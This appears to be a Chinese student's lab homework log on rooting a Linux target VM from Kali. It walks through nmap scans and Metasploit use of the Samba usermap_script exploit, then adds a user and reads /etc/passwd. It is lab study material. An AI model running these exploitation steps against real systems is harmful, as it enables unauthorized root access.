12.23 作业记录

获取Linux系统的root权限

1.启动靶机和Kali系统

启动靶机

启动Kali

2.信息收集(采集) nmap

2.1 查找存活主机

nmap 192.168.198.132 【由于网络配置更改,所以使用的IP地址在后文有修改】

(修改两虚拟机在同一网段的具体流程:

 依次点击 “更改配置” +> “还原默认设置”

 检查攻击机和靶机的网络适配器(这里需要一样,若不一样,需要手动修改)

 

 

)

2.2 扫描开放端口

nmap -sS -Pn -A 192.168.204.129  #【-Pn 有点问题】

3. 查找漏洞信息

3.1 收集具体的版本号与对应的漏洞

漏洞收集工具(数据库) metasploite

search scanner/smb #查找smb协议

(或者 在kali界面 右上角 

点击“ metasploit framework”  可切换 [ msf6 > ] )

use auxiliary/scanner/smb/smb_version    #使用版本探测器

3.2 查找相应的漏洞工具

3.3 利用漏洞工具进行攻击

use exploit/multi/samba/usermap_script  //切换漏洞工具

show options  //显示需要在攻击前需要设置的数据

set RHOSTS 192.168.204.129  #此为靶机IP地址

(在这里直接输入下面的命令)

4. 获取目标机的 root 权限。新建一个用户

攻击机创建用户

useradd -m test

前往靶机查看

cat /etc/passwd  #查看用户信息

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值